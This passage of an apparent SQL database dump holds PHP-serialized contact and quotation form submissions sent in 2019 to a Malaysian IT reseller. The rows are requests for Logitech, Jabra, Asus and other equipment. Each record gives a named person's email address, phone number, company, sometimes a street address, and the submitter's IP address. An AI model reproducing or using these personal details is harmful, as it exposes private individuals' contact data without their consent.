me...prefer WhatsApp....wanna get group x 1 unit, connect x 4 units...6-8 units of bcc950. Thank you\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"18\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-30 21:48:28','113.210.53.255','1'),(175,12,'a:11:{i:0;a:7:{s:2:\"id\";s:3:\"126\";s:4:\"slug\";s:19:\"get-quotation-jabra\";s:4:\"name\";s:21:\"Get Quotation (Jabra)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:3:\"129\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Jayagopie Gopal\";}i:2;a:7:{s:2:\"id\";s:3:\"130\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"Jayagopie.Gopal@invenco.com\";}i:3;a:7:{s:2:\"id\";s:3:\"133\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"017 3925629\";}i:4;a:7:{s:2:\"id\";s:3:\"131\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"Invenco Asia Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:3:\"135\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:81:\"Level 3, Wisma Ali Bawal 1, No 11, Jalan Tandang-Section 51. 46050 Petaling Jaya.\";}i:6;a:7:{s:2:\"id\";s:3:\"134\";s:4:\"slug\";s:7:\"product\";s:4:\"name\";s:7:\"Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:642:\"a:19:{i:0;s:16:\"Jabra Evolve 65t\";i:1;s:15:\"Jabra Evolve 80\";i:2;s:16:\"Jabra Evolve 75e\";i:3;s:15:\"Jabra Evolve 75\";i:4;s:29:\"Jabra Evolve 65 Stereo / Mono\";i:5;s:29:\"Jabra Evolve 40 Stereo / Mono\";i:6;s:29:\"Jabra Evolve 30 Stereo / Mono\";i:7;s:29:\"Jabra Evolve 20 Stereo / Mono\";i:8;s:18:\"Jabra Evolve 20 SE\";i:9;s:15:\"Jabra Engage 50\";i:10;s:17:\"Jabra Biz 2400 II\";i:11;s:29:\"Jabra BIZ 2400 II Mono 3-in-1\";i:12;s:21:\"Jabra Biz 2400 II DUO\";i:13;s:14:\"Jabra Biz 2300\";i:14;s:17:\"Jabra BIZ 2300 QD\";i:15;s:21:\"Jabra BIZ 2300 QD DUO\";i:16;s:14:\"Jabra Biz 1500\";i:17;s:22:\"Jabra Biz 1500 DUO USB\";i:18;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Jabra Evolve 80\";}i:7;a:7:{s:2:\"id\";s:3:\"132\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:3:\"125\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:3:\"127\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:3:\"125\";s:5:\"value\";s:2:\"88\";}i:10;a:7:{s:2:\"id\";s:3:\"128\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:3:\"125\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Jabra)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-05-02 10:27:51','1.9.215.50','1'),(176,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"Nurazmina\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"nurazmina@ite-intl.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"012 663 1162\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"IT Essentials Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:52:\"Pls quote me Zebra Z410 &amp; Motorola 92N0 / MC9000\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"10\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-05-02 16:30:05','175.143.197.108','1'),(177,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:7:\"Chee Yu\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"scanip@live.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0125521165\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"Sea Gamer Mall SDN BHD (MIS)\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"69, Taman Ria Jaya\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:32:\"Other (Please specify the model)\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:71:\"Mouse B100, MK200. or any other economy Mouse Keyboard. 50pcs or 100pcs\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"11\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-05-03 12:02:28','175.143.92.26','1'),(178,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"Muhammad Nur bin Che Ya\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"mnur.cheya@petronas.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"03-23925200\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"PETROSAINS SDN BHD\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:134:\"Hi, i would like to get quotation for laptop and pc. Asus ROG FX505G-EBQ269T (5 UNIT). Asus G11CD (2 UNIT). Asus 24â€ VG245H (2 UNIT)\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-05-03 15:35:45','170.38.23.20','1'),(179,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"Liew Win Nie\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"wnliew@lipico.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"012 2556607\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"Lipico Engineering Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:54:\"1-10,2-10 Jalan Puteri Puchong, 47100 Puchong Selangor\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"10\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-05-06 09:59:52','119.75.39.86','1'),(180,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"ZULKEFLY YUSUP\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"zulkefly@mmu.edu.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0136335120\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"MULTIMEDIA UNIVERSITY\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"MMU CYBERJAYA\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:47:\"Logitech Group, Logitech Rally, Logitech MeetUp\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:51:\"CAN YOU RECOMMEND MODEL FOR SKYPE WITH COMPLETE SET\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-05-07 12:23:13','203.106.67.74','1'),(181,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"Amir Aziz\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"mha@inscale.net\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0125896212\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"Inscale Asia Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:60:\"Hi, can i get POC for MR42 and cloud management trial login?\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"45\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-05-07 13:03:08','210.19.254.174','1'),(182,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Ravindar Kumar\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"ravin.rk@gcu.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0123650956\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"GCU Consultants Sdn 